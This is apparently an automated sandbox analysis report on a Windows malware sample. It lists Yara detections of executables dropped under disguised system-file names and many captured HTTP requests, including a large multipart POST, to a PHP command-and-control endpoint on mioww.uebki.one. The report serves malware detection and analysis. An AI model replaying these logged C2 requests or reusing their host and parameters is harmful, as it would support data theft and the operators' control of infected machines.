Source: Yara match; File source: C:\Windows\Media\WinStore.App.exe, type: DROPPED
Source: Yara match; File source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED
Source: Yara match; File source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED
Source: Joe Sandbox View; IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View; IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected:
GET /L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: mioww.uebki.one
Connection: Keep-Alive
                            Source: global traffic
                            HTTP traffic detected:
                                GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiIlVGM2MTO4IWZwYmM1MjNlBDMkJzM2EzMjhTNxUmM2cjN1cjNzADO3IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1
                                Accept: */*
                                Content-Type: text/javascript
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                Host: mioww.uebki.one
                            Source: global traffic
                            HTTP traffic detected:
                                POST /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryLi196lcbgF3BNosl
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                Host: mioww.uebki.one
                                Content-Length: 81424
                                Expect: 100-continue
                                Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN
4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN
4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN
4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
